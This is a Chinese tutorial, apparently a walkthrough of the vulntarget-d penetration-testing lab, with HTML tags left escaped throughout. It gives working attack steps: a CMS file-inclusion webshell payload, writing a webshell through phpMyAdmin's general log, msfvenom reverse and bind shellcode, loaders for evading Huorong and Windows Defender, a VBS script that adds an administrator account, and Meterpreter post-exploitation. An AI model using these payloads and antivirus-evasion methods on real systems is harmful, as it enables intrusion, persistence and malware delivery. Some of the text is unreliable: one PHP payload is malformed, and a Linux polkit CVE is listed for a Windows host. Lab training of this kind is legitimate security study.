Vulntarget免杀专题实战教学文档<\/h1>

一、靶机环境概述<\/h2>

本靶机(vulntarget-d)是一个相对简单的渗透测试环境，主要考察外网打点、内网横向移动和免杀技术。靶机包含以下关键组件：<\/p>

骑士CMS系统（存在文件包含漏洞）<\/li>
PHPMyAdmin（存在弱口令和日志写入漏洞）<\/li>
内网Windows主机（存在CVE-2021-4034提权漏洞）<\/li>

火绒杀毒软件和Windows Defender防护<\/li> <\/ul>

二、外网打点阶段<\/h2>

1. 骑士CMS文件包含漏洞利用<\/h3>

漏洞位置<\/strong>：骑士CMS的模板包含功能存在文件包含漏洞<\/p>

利用步骤<\/strong>：<\/p>

首先通过文件包含写入webshell：<\/li> <\/ol>
POST \/path\/to\/vulnerable\/script HTTP\/1.1 variable=1&tpl=<?php fputs(fopen("110.php","w"),"<?php eval(\$_POST[110]ob_flush();?>\/r\/n<qscms\/company_show 列表名="info" 企业id="$_GET['id']"\/>) <\/code><\/pre> 包含日志文件获取webshell（注意日期匹配）：<\/li> <\/ol> POST \/path\/to\/vulnerable\/script HTTP\/1.1 variable=1&tpl=data\/Runtime\/Logs\/Home\/24_07_09.log <\/code><\/pre> 2. 反弹Shell与提权<\/h3> 通过webshell上传反弹shell脚本<\/li> 使用CVE-2021-4034（Polkit提权漏洞）进行权限提升<\/li> <\/ol> 三、内网横向移动<\/h2> 1. 内网探测<\/h3> 发现内网主机：<\/p> 10.0.20.131:445 open (Windows 7 Ultimate 7601 Service Pack 1) 10.0.20.132:80 open 10.0.20.132:8888 open (宝塔面板) <\/code><\/pre> 2. PHPMyAdmin利用<\/h3> 利用步骤<\/strong>：<\/p> 通过弱口令root\/root登录<\/li> 开启全局日志并写入webshell：<\/li> <\/ol> show<\/span> global<\/span> variables like<\/span> "%genera%"<\/span>; <\/span><\/span>set<\/span> global<\/span> general_log=<\/span>'on'<\/span>; <\/span><\/span>SET<\/span> global<\/span> general_log_file=<\/span>'C:\/phpstudy\/PHPTutorial\/WWW\/cmd.php'<\/span>; <\/span><\/span>SELECT<\/span> '<?php @eval($_POST["cmd"])?>'<\/span>; <\/span><\/span>set<\/span> global<\/span> general_log=<\/span>'off'<\/span>; <\/span><\/span><\/code><\/pre>3. 免杀技术应用<\/h3> 场景<\/strong>：内网主机存在火绒杀毒软件<\/p> 免杀方法1<\/strong>：使用crowsec_shelllcodeBypass项目<\/p> 生成原始shellcode：<\/li> <\/ol> msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -i 7<\/span> -b '\x00'<\/span> lport=<\/span>4444<\/span> -f raw -o crowsec.jpg <\/span><\/span><\/code><\/pre> 使用crowsec_shelllcodeBypass.exe加载shellcode<\/li> <\/ol> 免杀方法2<\/strong>：进程迁移技巧当无法直接获取hashdump时，进行进程迁移：<\/p> run post\/windows\/manage\/migrate <\/code><\/pre> 四、域控攻击<\/h2> 1. 信息收集<\/h3> 发现域控主机：<\/p> 10.0.20.134:80 (IIS Windows Server) 10.0.20.134:18000 (FCKeditor编辑器) <\/code><\/pre> 2. FCKeditor漏洞利用<\/h3> 利用步骤<\/strong>：<\/p> 发现编辑器路径：<\/li> <\/ol> \/editor\/filemanager\/browser\/default\/browser.html <\/code><\/pre> 构造上传请求：<\/li> <\/ol> POST \/editor\/filemanager\/connectors\/asp\/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F <\/code><\/pre> 上传免杀ASPX木马（需修改文件名绕过限制）<\/li> <\/ol> 3. Windows Defender绕过<\/h3> 方法1<\/strong>：使用VBS脚本添加用户<\/p> set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT:\/\/"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"\/Administrators,group") Set od=ob.Create("user","admin") od.SetPassword "pass!@#!23" od.SetInfo Set of=GetObject(os&"\/admin",user) oe.add os&"\/admin" <\/code><\/pre> 方法2<\/strong>：使用FourEye框架生成免杀木马<\/p> 生成原始shellcode：<\/li> <\/ol> msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=<\/span>192.168.0.107 LPORT=<\/span>8092<\/span> -f raw -o x64.raw <\/span><\/span><\/code><\/pre> 使用FourEye进行免杀处理：<\/li> <\/ol> .\/setup.sh <\/span><\/span># 选择xor加密方式<\/span> <\/span><\/span># 输入shellcode路径<\/span> <\/span><\/span># 生成免杀exe<\/span> <\/span><\/span><\/code><\/pre>五、后渗透技巧<\/h2> RDP开启<\/strong>：<\/li> <\/ol> run post\/windows\/manage\/enable_rdp <\/code><\/pre> 内网扫描工具<\/strong>：<\/li> <\/ol> 使用kscan进行内网扫描：<\/li> <\/ul> kscan_windows_amd64.exe -t 10.0.20.0\/24 -o res.txt <\/span><\/span><\/code><\/pre> 免杀fscan<\/strong>：上传定制版内网扫描工具绕过杀软检测<\/li> <\/ol> 六、关键知识点总结<\/h2> 文件包含漏洞利用<\/strong>：注意日志文件路径和日期匹配<\/li> PHPMyAdmin日志写入<\/strong>：需要全局日志权限<\/li> 免杀技术要点<\/strong>： Shellcode加密（XOR等）<\/li> 进程注入<\/li> 合法程序伪装<\/li> <\/ul> <\/li> 内网横向移动<\/strong>：多协议探测（SMB、RDP等）<\/li> 权限维持技术<\/li> <\/ul> <\/li> 域控攻击<\/strong>：编辑器漏洞利用<\/li> 防御绕过技术<\/li> <\/ul> <\/li> <\/ol> 七、防御建议<\/h2> 及时更新CMS系统和中间件<\/li> 禁用不必要的日志功能<\/li> 使用强密码策略<\/li> 部署多层防御机制<\/li> 限制网络共享和远程访问权限<\/li> <\/ol> 八、参考资源<\/h2> crowsec_shelllcodeBypass项目<\/li> FourEye免杀框架：https:\/\/github.com\/zhzyker\/FourEye<\/li> kscan内网扫描工具：https:\/\/github.com\/lcvvvv\/kscan\/<\/li> 免杀技术研究：https:\/\/mp.weixin.qq.com\/s\/6_j38gpvTfCVDTcCYizCYA<\/li> <\/ol> 本教学文档涵盖了从外网打点到内网横向移动的全过程，重点突出了免杀技术的应用场景和实现方法，可作为红队演练和渗透测试的参考指南。<\/p>